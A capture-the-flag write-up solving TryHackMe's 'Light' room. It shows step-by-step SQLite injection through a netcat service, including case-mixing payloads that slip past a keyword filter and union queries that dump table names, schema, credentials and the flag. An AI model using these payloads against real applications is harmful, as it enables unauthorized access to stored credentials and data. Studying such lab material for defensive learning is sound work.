In this write-up, I’ll guide you through solving the Light challenge from TryHackMe. The challenge involves exploiting a database application to retrieve sensitive information. Let’s dive into the steps!

Challenge Description
The task provides the following instructions:
I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using:nc CHALLENGE_IP 1337
You can use the usernamesmokeyto get started.
Challenge link: https://tryhackme.com/r/room/lightroom
Walkthrough
I started by using the netcat command to connect to the database and input the provided username smokey.
┌──(kali㉿kali)-[~]
└─$ nc CHALLENGE_IP 1337
Welcome to the Light database!
Please enter your username: smokey
Password: [REDACTED]
The username smokey returns an associated password, but testing other common usernames like admin, root, etc., only resulted in Username not found.
Please enter your username: test
Username not found.
Please enter your username: admin
Username not found.
Please enter your username: administrator
Username not found.
Please enter your username: root
Username not found.
Please enter your username:
Identifying SQL Injection Vulnerability
I tested various random inputs, eventually triggering an error with a single quote ('), indicating a potential SQL injection vulnerability.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
Next, I used different SQL injection payloads to analyze the responses. Here are some examples:
Please enter your username: smokey' OR '1'='1
Password: [REDACTED]
Please enter your username: smokey' OR '1'='1' ORDER BY username ASC LIMIT 1 OFFSET 0
Error: unrecognized token: "' LIMIT 30"
Please enter your username: smokey' UNION SELECT username, password FROM users --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: smokey" UNION SELECT username, password FROM users
Ahh there is a word in there I don't like :(
Please enter your username: '1'='1
Error: near "1": syntax error
The response to smokey' OR '1'='1 provided a password but didn’t match the expected challenge answers. From these errors, I inferred:
- Comment characters (
--,/*) are restricted. - Keywords like
UNIONandSELECTare filtered.
Through a quick search, I discovered that the error message "Error: near '1': syntax error" is commonly associated with SQLite databases. This was a valuable clue, as it helped me narrow my focus to crafting SQLite-specific injection payloads.
Bypassing Filters and Extracting Data
Using case evasion techniques for filtered keywords, I bypassed the restrictions and found the table name (admintable):
Please enter your username: smokey' UnIon SELECT tbl_name, null FROM sqlite_master WHERE type='table
Ahh there is a word in there I don't like :(
Please enter your username: smokey' UnIon SeLect tbl_name, null FROM sqlite_master WHERE type='table
Error: SELECTs to the left and right of UNION do not have the same number of result columns
Please enter your username: smokey' UnIon SeLect tbl_name FROM sqlite_master WHERE type='table
Password: admintable
I then researched SQLite injection payloads using GitHub repositories and other resources. To extract the schema of the admintable, I used the following payload:
Please enter your username: smokey' UnIon SeLect sql FROM sqlite_master WHERE name = 'admintable
Password: CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
From there, I successfully extracted a username and its associated password:
Please enter your username: smokey' UnIon SeLect username FROM admintable WHERE username LIKE '%'
Password: [REDACTED USERNAME]
Please enter your username: smokey' UnIon SeLect password FROM admintable WHERE username = '[REDACTED USERNAME]
Password: [REDACTED]
Retrieving the Flag
For the final question, I scanned the challenge IP using nmap and found the SSH port open. However, attempts to log in using the credentials in hand were unsuccessful. Returning to netcat, I calculated the number of rows in the admintable:
Please enter your username: smokey' UnIon SeLect COUNT(username) FROM admintable WHERE '1
Password: 2
This confirmed that another entry existed. Using additional payloads, I extracted the second username and its password:
Please enter your username: smokey' UnIon SeLect username FROM admintable WHERE username != '[REDACTED USERNAME]
Password: flag
Please enter your username: smokey' UnIon SeLect password FROM admintable WHERE username != '[REDACTED USERNAME]
Password: [REDACTED FLAG]
The second password was accepted as the flag in the TryHackMe challenge.
By identifying SQL injection vulnerabilities, bypassing filters, and using SQLite-specific payloads, I successfully solved the Light challenge and retrieved the flag.
I hope this walkthrough helps you understand the steps and techniques used. Good luck on your CTF journey!